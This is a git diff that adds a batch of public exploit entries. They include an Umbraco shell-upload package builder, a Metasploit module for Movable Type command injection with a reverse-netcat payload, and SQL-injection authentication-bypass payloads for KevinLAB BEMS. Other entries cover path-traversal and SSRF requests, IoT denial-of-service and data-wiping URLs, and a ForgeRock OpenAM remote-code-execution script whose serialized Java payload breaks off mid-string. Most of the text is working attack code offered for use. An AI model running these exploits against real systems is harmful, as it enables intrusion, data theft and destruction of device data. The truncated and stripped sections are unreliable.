diff --git a/exploits/aspx/webapps/50241.py b/exploits/aspx/webapps/50241.py new file mode 100755 index 000000000..f4f22656b --- /dev/null +++ b/exploits/aspx/webapps/50241.py @@ -0,0 +1,72 @@ +# Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated) +# Exploit Author: BitTheByte +# Description: Authenticated path traversal vulnerability. +# Exploit Research: https://www.tenable.com/security/research/tra-2020-59 +# Vendor Homepage: https://umbraco.com/ +# Version: <= 8.9.1 +# CVE : CVE-2020-5811 + +import string +import random +import argparse +import zipfile +import os + +package_xml = f""" + + + + {{filename}} + {{upload_path}} + {{filename}} + + + + + PoC-{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))} + 1.0.0 + + MIT License + https://example.com + + 0 + 0 + 0 + + + + CVE-2020-5811 + https://example.com + + + + + + + + + + + + + + + +""" + +parser = argparse.ArgumentParser(description='CVE-2020-5811') +parser.add_argument('--shell', type=str, help='Shell file to upload', required=True) +parser.add_argument('--upload-path', type=str, help='Shell file update path on target server (default=~/../scripts)', default='~/../scripts') +args = parser.parse_args() + +if not os.path.isfile(args.shell): + print("[ERROR] please use a correct path for the shell file.") + +output_file = "exploit.zip" + +package = zipfile.ZipFile(output_file, 'w') +package.writestr('package.xml', package_xml.format(filename=os.path.basename(args.shell), upload_path=args.upload_path)) +package.writestr(os.path.basename(args.shell), open(args.shell, 'r').read()) +package.close() + +print(f"[DONE] Created Umbraco package: {output_file}") \ No newline at end of file diff --git a/exploits/aspx/webapps/50462.txt b/exploits/aspx/webapps/50462.txt new file mode 100644 index 000000000..40e435432 --- /dev/null +++ b/exploits/aspx/webapps/50462.txt @@ -0,0 +1,28 @@ +# Exploit Title: Umbraco v8.14.1 - 'baseUrl' SSRF +# Date: July 5, 2021 +# Exploit Author: NgoAnhDuc +# Vendor Homepage: https://our.umbraco.com/ +# Software Link: https://our.umbraco.com/download/releases/8141 +# Version: v8.14.1 +# Affect: Umbraco CMS v8.14.1, Umbraco Cloud + +Vulnerable code: + +Umbraco.Web.Editors.HelpController.GetContextHelpForPage(): +https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/HelpController.cs#L14 +Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent(): +https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L50 +Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss(): +https://github.com/umbraco/Umbraco-CMS/blob/710ecf2537a8630d00db793877d5c169c5cf8095/src/Umbraco.Web/Editors/DashboardController.cs#L91 + +PoC: + +/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=https://SSRF-HOST.EXAMPLE +/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl= +https://SSRF-HOST.EXAMPLE/ +/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=https://SSRF-HOST.EXAMPLE/ + +Notes: +- There's no "/" suffix in payload 1 +- "/" suffix is required in payload 2 and payload 3 +- "section" parameter value must be changed each exploit attempt \ No newline at end of file diff --git a/exploits/cgi/webapps/50464.rb b/exploits/cgi/webapps/50464.rb new file mode 100755 index 000000000..15ed8400b --- /dev/null +++ b/exploits/cgi/webapps/50464.rb @@ -0,0 +1,112 @@ +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Movable Type XMLRPC API Remote Command Injection", + 'Description' => %q{ + This module exploit Movable Type XMLRPC API Remote Command Injection. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Etienne Gervais', # author & msf module, + 'Charl-Alexandre Le Brun' # author & msf module + ], + 'References' => + [ + ['CVE', '2021-20837'], + ['URL', 'https://movabletype.org/'], + ['URL', 'https://nemesis.sh/'] + ], + 'DefaultOptions' => + { + 'SSL' => false, + }, + 'Platform' => ['linux'], + 'Arch' => ARCH_CMD, + 'Privileged' => false, + 'DisclosureDate' => "2021-10-20", + 'DefaultTarget' => 0, + 'Targets' => [ + [ + 'Automatic (Unix In-Memory)', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_memory, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } + } + ] + ] + )) + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI', [ true, 'The URI of the MovableType', '/cgi-bin/mt/']) + ], self.class + ) + end + + def cmd_to_xml(cmd, opts={}) + base64_cmd = Rex::Text.encode_base64("`"+cmd+"`") + xml_body = <<~THISSTRING + + + mt.handler_to_coderef + + + + + #{base64_cmd} + + + + + + THISSTRING + end + + def check + begin + fingerprint = Rex::Text.rand_text_alpha(32) + command_payload = cmd_to_xml("echo "+fingerprint) + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,'mt-xmlrpc.cgi'), + 'ctype' => 'text/xml; charset=UTF-8', + 'data' => command_payload + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? + fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") if res.code != 200 + + if res && res.body.include?("Can't locate "+fingerprint) + return Exploit::CheckCode::Vulnerable + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + Exploit::CheckCode::Safe + end + + def exploit + begin + command_payload = cmd_to_xml(payload.raw) + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,'mt-xmlrpc.cgi'), + 'ctype' => 'text/xml; charset=UTF-8', + 'data' => command_payload + }) + + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + + end +end \ No newline at end of file diff --git a/exploits/hardware/webapps/49459.txt b/exploits/hardware/webapps/49459.txt new file mode 100644 index 000000000..14c307200 --- /dev/null +++ b/exploits/hardware/webapps/49459.txt @@ -0,0 +1,67 @@ +# Exploit Title: Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated) +# Date: 07.11.2020 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.selea.com + +Selea Targa IP OCR-ANPR Camera Unauthenticated RTP/RTSP/M-JPEG Stream Disclosure + + +Vendor: Selea s.r.l. +Product web page: https://www.selea.com +Affected version: Model: iZero + Targa 512 + Targa 504 + Targa Semplice + Targa 704 TKM + Targa 805 + Targa 710 INOX + Targa 750 + Targa 704 ILB + Firmware: BLD201113005214 + BLD201106163745 + BLD200304170901 + BLD200304170514 + BLD200303143345 + BLD191118145435 + BLD191021180140 + BLD191021180140 + CPS: 4.013(201105) + 3.100(200225) + 3.005(191206) + 3.005(191112) + +Summary: IP camera with optical character recognition (OCR) software for automatic +number plate recognition (ANPR) also equipped with ADR system that enables it to read +the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number +of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number +plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes +this camera suitable for all installation conditions. Its built-in OCR software works +as an automatic and independent system without the need of a computer, thus giving +autonomy to the device even in the event of an interruption in the connection between +the camera and the operations centre. + +Desc: The ANPR camera suffers from an unauthenticated and unauthorized live stream +disclosure when p1.mjpg or p1.264 is called. + +Tested on: GNU/Linux 3.10.53 (armv7l) + PHP/5.6.22 + selea_httpd + HttpServer/0.1 + SeleaCPSHttpServer/1.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5619 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5619.php + + +07.11.2020 + +-- + + +Connection to RTP/RTSP stream: rtsp://192.168.1.17/p1.264 +Connection to M-JPEG stream: http://192.168.1.17/p1.mjpg \ No newline at end of file diff --git a/exploits/hardware/webapps/49937.txt b/exploits/hardware/webapps/49937.txt new file mode 100644 index 000000000..30aea47af --- /dev/null +++ b/exploits/hardware/webapps/49937.txt @@ -0,0 +1,47 @@ +# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS) +# Date: 01/06/2021 +# Exploit Author: sirpedrotavares +# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html +# Software Link: https://www.chiyu-tech.com/category-hardware.html +# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021 +# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC +# CVE: CVE-2021-31642 +# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks + +Description: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device. +CVE ID: CVE-2021-31642 +CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H +URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642 + +Affected parameter: page=Component: if.cgi +Payload: +if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 + +====HTTP request====== +GET +/if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000 +HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) +Gecko/20100101 Firefox/87.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 +Accept-Encoding: gzip, deflate +Authorization: Basic YWRtaW46YWRtaW4= +Connection: close +Referer: http://127.0.0.1/AccLog.htm +Cookie: fresh= +Upgrade-Insecure-Requests: 1 + + + +Steps to reproduce: + 1. Navigate to the vulnerable device + 2. Make a GET request to the CGI component (if.cgi) + 3. Append the payload at the end of the vulnerable parameter (page) + 4. Submit the request and observe payload execution + + + Mitigation: The latest version of the CHIYU firmware should be installed +to mitigate this vulnerability. \ No newline at end of file diff --git a/exploits/hardware/webapps/50146.txt b/exploits/hardware/webapps/50146.txt new file mode 100644 index 000000000..b4ae9538b --- /dev/null +++ b/exploits/hardware/webapps/50146.txt @@ -0,0 +1,62 @@ +# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass +# Date: 05.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kevinlab.com + +Vendor: KevinLAB Inc. +Product web page: http://www.kevinlab.com +Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) + +Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy +management platform. KevinLAB's BEMS (Building Energy Management System) enables +efficient energy management in buildings. It improves the efficient of energy use +by collecting and analyzing various information of energy usage and facilities in +the building. It also manages energy usage, facility efficiency and indoor environment +control. + +Desc: The application suffers from an unauthenticated SQL Injection vulnerability. +Input passed through 'input_id' POST parameter in '/http/index.php' is not properly +sanitised before being returned to the user or used in SQL queries. This can be exploited +to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication +mechanism. + +Tested on: Linux CentOS 7 + Apache 2.4.6 + Python 2.7.5 + PHP 5.4.16 + MariaDB 5.5.68 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5655 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php + + +05.07.2021 + +-- + + +PoC POST data payload (extract): +-------------------------------- + +POST /http/index.php HTTP/1.1 +Host: 192.168.1.3 + +requester=login +request=login +params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}] + + +PoC POST data payload (authbypass): +----------------------------------- + +POST /http/index.php HTTP/1.1 +Host: 192.168.1.3 + +requester=login +request=login +params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}] \ No newline at end of file diff --git a/exploits/hardware/webapps/50172.txt b/exploits/hardware/webapps/50172.txt new file mode 100644 index 000000000..54042d3ff --- /dev/null +++ b/exploits/hardware/webapps/50172.txt @@ -0,0 +1,79 @@ +# Exploit Title: Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF +# Date: 13.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.panasonic.com + + + + + [CSRF] +[Anonymous user log in = ON] +orororororororororororororor + [Change admin password] + + + +
+ + + + + + + +
+ + + + \ No newline at end of file diff --git a/exploits/hardware/webapps/50211.txt b/exploits/hardware/webapps/50211.txt new file mode 100644 index 000000000..ac43f9743 --- /dev/null +++ b/exploits/hardware/webapps/50211.txt @@ -0,0 +1,37 @@ +# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE +# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM +# Date: 6-16-21 (Vendor Notified) +# Exploit Author: Ken 's1ngular1ty' Pyle +# Vendor Homepage: https://www.geovision.com.tw/cyber_security.php +# Version: <= 5.3.3 +# Tested on: Windows 20XX / MULTIPLE +# CVE : https://www.geovision.com.tw/cyber_security.php + +GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft: + +Nested Exploitation of the LFI, XSS, HTML / Browser Injection: + +GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name= HTTP/1.1 + +Absolute exploitation of the LFI: + +POST /Visitor/bin/WebStrings.srf?obj_name=win.ini + +GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini + +Additionally, the vendor has issued an ineffective / broken patch (https://www.geovision.com.tw/cyber_security.php) which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor. + + +ex. obj_name=INJECTEDHTML / XSS + +The application fails to properly enforce permissions and sanitize user request. This allows for LFI / Remote Code Execution through several vectors: + +ex. /Visitor//%252e(path to target) + +These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API: + +The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack. + +These attacks were disclosed as part of the IOTVillage Presentation: + + https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20villages/DEFCON%2029%20IoT%20Village%20-%20Ken%20Pyle%20-%20BLUEMONDAY%20Series%20Exploitation%20and%20Mapping%20of%20Vulnerable%20Devices%20at%20Scale.mp4 \ No newline at end of file diff --git a/exploits/hardware/webapps/50250.txt b/exploits/hardware/webapps/50250.txt new file mode 100644 index 000000000..93221ce83 --- /dev/null +++ b/exploits/hardware/webapps/50250.txt @@ -0,0 +1,16 @@ +# Exploit Title: Compro Technology IP Camera - 'killps.cgi' Denial-of-Service (DoS) +# Date: 2021-09-30 +# Exploit Author: icekam,xiao13,Rainbow,tfsec +# Software Link: http://www.comprotech.com.hk/ +# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 +# CVE : CVE-2021-40378 + +There is a backdoor prefabricated in the device in this path. Accessing the +file through the browser after logging in will cause the device to delete +all data (including the data of the camera itself). + +Payload:Visit this page after logging in +/cgi-bin/support/killps.cgi + +please refer to: +https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md \ No newline at end of file diff --git a/exploits/ios/dos/49883.py b/exploits/ios/dos/49883.py new file mode 100755 index 000000000..e45d5a843 --- /dev/null +++ b/exploits/ios/dos/49883.py @@ -0,0 +1,23 @@ +# Exploit Title: WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC) +# Author: Luis Martinez +# Discovery Date: 2021-05-18 +# Vendor Homepage: https://apps.apple.com/mx/app/webssh-ssh-client/id497714887 +# Software Link: App Store for iOS devices +# Tested Version: 14.16.10 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: iPhone 7 iOS 14.5.1 + +# Steps to Produce the Crash: +# 1.- Run python code: WebSSH_for_iOS_14.16.10.py +# 2.- Copy content to clipboard +# 3.- Open "WebSSH for iOS" +# 4.- Click -> Tools +# 5.- Click -> mashREPL +# 6.- Paste ClipBoard on "mashREPL>" +# 7.- Intro +# 8.- Crashed + +#!/usr/bin/env python + +buffer = "\x41" * 300 +print (buffer) \ No newline at end of file diff --git a/exploits/ios/dos/49952.py b/exploits/ios/dos/49952.py new file mode 100755 index 000000000..6d5296fdb --- /dev/null +++ b/exploits/ios/dos/49952.py @@ -0,0 +1,35 @@ +# Exploit Title: Color Notes 1.4 - Denial of Service (PoC) +# Date: 06-04-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/gt/app/color-notes/id830515136 +# Version: 1.4 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: +f = open("payload.txt","w") +f.write(buffer) +f.close() +print ("File created") +except: +print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49953.py b/exploits/ios/dos/49953.py new file mode 100755 index 000000000..86a498847 --- /dev/null +++ b/exploits/ios/dos/49953.py @@ -0,0 +1,35 @@ +# Exploit Title: Macaron Notes great notebook 5.5 - Denial of Service (PoC) +# Date: 06-04-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/us/app/macaron-notes-great-notebook/id1079862221 +# Version: 5.5 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49954.py b/exploits/ios/dos/49954.py new file mode 100755 index 000000000..66e9c636c --- /dev/null +++ b/exploits/ios/dos/49954.py @@ -0,0 +1,35 @@ +# Exploit Title: My Notes Safe 5.3 - Denial of Service (PoC) +# Date: 06-04-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/us/app/my-notes-safe/id689971781 +# Version: 5.3 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49979.py b/exploits/ios/dos/49979.py new file mode 100755 index 000000000..0fb3bf745 --- /dev/null +++ b/exploits/ios/dos/49979.py @@ -0,0 +1,35 @@ +# Exploit Title: n+otes 1.6.2 - Denial of Service (PoC) +# Date: 06-09-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/us/app/n-otes/id596895960 +# Version: 1.6.2 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/java/webapps/50131.py b/exploits/java/webapps/50131.py new file mode 100755 index 000000000..045d7444f --- /dev/null +++ b/exploits/java/webapps/50131.py @@ -0,0 +1,152 @@ +# Exploit Title: ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 2021-07-14 +# Exploit Author: Photubias – tijl[dot]deneut[at]Howest[dot]be for www.ic4.be +# Vendor Advisory: [1] https://backstage.forgerock.com/knowledge/kb/article/a47894244 +# Vendor Homepage: https://github.com/OpenIdentityPlatform/OpenAM/ +# Version: [1] OpenAM 14.6.3 +# [2] Forgerock 6.0.0.x and all versions of 6.5, up to and including 6.5.3, and is fixed as of version AM 7 released on June 29, 2021 +# Tested on: OpenAM 14.6.3 and Tomcat/8.5.68 with JDK-8u292 on Debian 10 +# CVE: CVE-2021-35464 + +#!/usr/bin/env python3 + +''' + Copyright 2021 Photubias(c) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + File name CVE-2021-35464.py + written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be + + This is a native implementation without requirements, written in Python 3. + Works equally well on Windows as Linux (as MacOS, probably ;-) + + Rewritten from and full credits to @Y4er_ChaBug: + https://github.com/Y4er/openam-CVE-2021-35464 + and of course the discoverer @artsploit: + https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 + Created using https://github.com/frohoff/ysoserial +''' + +import urllib.request, urllib.parse, ssl, sys, optparse + +## Static vars; change at will, but recommend leaving as is +sURL = 'http://192.168.0.100:7080/openam' +sEndpoint = 'ccversion/Version' +sEndpoint = 'oauth2/..;/ccversion/Version' ## This bypasses potential WAFs +iTimeout = 5 +strSerializedPayload = b'AKztAAVzcgAXamF2YS51dGlsLlByaW9yaXR5UXVldWWU2jC0-z-CsQMAAkkABHNpemVMAApjb21wYXJhdG9ydAAWTGphdmEvdXRpbC9Db21wYXJhdG9yO3hwAAAAAnNyADBvcmcuYXBhY2hlLmNsaWNrLmNvbnRyb2wuQ29sdW1uJENvbHVtbkNvbXBhcmF0b3IAAAAAAAAAAQIAAkkADWFzY2VuZGluZ1NvcnRMAAZjb2x1bW50ACFMb3JnL2FwYWNoZS9jbGljay9jb250cm9sL0NvbHVtbjt4cAAAAAFzcgAfb3JnLmFwYWNoZS5jbGljay5jb250cm9sLkNvbHVtbgAAAAAAAAABAgATWgAIYXV0b2xpbmtaAAplc2NhcGVIdG1sSQAJbWF4TGVuZ3RoTAAKYXR0cmlidXRlc3QAD0xqYXZhL3V0aWwvTWFwO0wACmNvbXBhcmF0b3JxAH4AAUwACWRhdGFDbGFzc3QAEkxqYXZhL2xhbmcvU3RyaW5nO0wACmRhdGFTdHlsZXNxAH4AB0wACWRlY29yYXRvcnQAJExvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvRGVjb3JhdG9yO0wABmZvcm1hdHEAfgAITAALaGVhZGVyQ2xhc3NxAH4ACEwADGhlYWRlclN0eWxlc3EAfgAHTAALaGVhZGVyVGl0bGVxAH4ACEwADW1lc3NhZ2VGb3JtYXR0ABlMamF2YS90ZXh0L01lc3NhZ2VGb3JtYXQ7TAAEbmFtZXEAfgAITAAIcmVuZGVySWR0ABNMamF2YS9sYW5nL0Jvb2xlYW47TAAIc29ydGFibGVxAH4AC0wABXRhYmxldAAgTG9yZy9hcGFjaGUvY2xpY2svY29udHJvbC9UYWJsZTtMAA10aXRsZVByb3BlcnR5cQB-AAhMAAV3aWR0aHEAfgAIeHAAAQAAAABwcHBwcHBwcHBwdAAQb3V0cHV0UHJvcGVydGllc3Bwc3IAHm9yZy5hcGFjaGUuY2xpY2suY29udHJvbC5UYWJsZQAAAAAAAAABAgAXSQAOYmFubmVyUG9zaXRpb25aAAlob3ZlclJvd3NaABdudWxsaWZ5Um93TGlzdE9uRGVzdHJveUkACnBhZ2VOdW1iZXJJAAhwYWdlU2l6ZUkAE3BhZ2luYXRvckF0dGFjaG1lbnRaAAhyZW5kZXJJZEkACHJvd0NvdW50WgAKc2hvd0Jhbm5lcloACHNvcnRhYmxlWgAGc29ydGVkWgAPc29ydGVkQXNjZW5kaW5nTAAHY2FwdGlvbnEAfgAITAAKY29sdW1uTGlzdHQAEExqYXZhL3V0aWwvTGlzdDtMAAdjb2x1bW5zcQB-AAdMAAtjb250cm9sTGlua3QAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvQWN0aW9uTGluaztMAAtjb250cm9sTGlzdHEAfgAQTAAMZGF0YVByb3ZpZGVydAAsTG9yZy9hcGFjaGUvY2xpY2svZGF0YXByb3ZpZGVyL0RhdGFQcm92aWRlcjtMAAZoZWlnaHRxAH4ACEwACXBhZ2luYXRvcnQAJUxvcmcvYXBhY2hlL2NsaWNrL2NvbnRyb2wvUmVuZGVyYWJsZTtMAAdyb3dMaXN0cQB-ABBMAAxzb3J0ZWRDb2x1bW5xAH4ACEwABXdpZHRocQB-AAh4cgAob3JnLmFwYWNoZS5jbGljay5jb250cm9sLkFic3RyYWN0Q29udHJvbAAAAAAAAAABAgAJTAAOYWN0aW9uTGlzdGVuZXJ0ACFMb3JnL2FwYWNoZS9jbGljay9BY3Rpb25MaXN0ZW5lcjtMAAphdHRyaWJ1dGVzcQB-AAdMAAliZWhhdmlvcnN0AA9MamF2YS91dGlsL1NldDtMAAxoZWFkRWxlbWVudHNxAH4AEEwACGxpc3RlbmVydAASTGphdmEvbGFuZy9PYmplY3Q7TAAObGlzdGVuZXJNZXRob2RxAH4ACEwABG5hbWVxAH4ACEwABnBhcmVudHEAfgAXTAAGc3R5bGVzcQB-AAd4cHBwcHBwcHBwcAAAAAIAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAXBzcgATamF2YS51dGlsLkFycmF5TGlzdHiB0h2Zx2GdAwABSQAEc2l6ZXhwAAAAAHcEAAAAAHhzcgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHhwcHBwcHBwcHBwdwQAAAADc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0_BbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAITAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA_____3VyAANbW0JL_RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF_gGCFTgAgAAeHAAABRfyv66vgAAADQBBgoARgCKCgCLAIwKAIsAjQoAHQCOCAB7CgAbAI8KAJAAkQoAkACSBwB8CgCLAJMIAJQKACAAlQgAlggAlwcAmAgAmQgAWQcAmgoAGwCbCACcCABxBwCdCwAWAJ4LABYAnwgAaAgAoAcAoQoAGwCiBwCjCgCkAKUIAKYHAKcIAKgKACAAqQgAqgkAJQCrBwCsCgAlAK0IAK4KAK8AsAoAIACxCACyCACzCAC0CAC1CAC2BwC3BwC4CgAwALkKADAAugoAuwC8CgAvAL0IAL4KAC8AvwoALwDACgAgAMEIAMIKABsAwwoAGwDECADFBwBlCgAbAMYIAMcHAMgIAMkIAMoHAMsKAEMAzAcAzQcAzgEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAlTHlzb3NlcmlhbC9wYXlsb2Fkcy9Ub21jYXRFY2hvSW5qZWN0OwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPT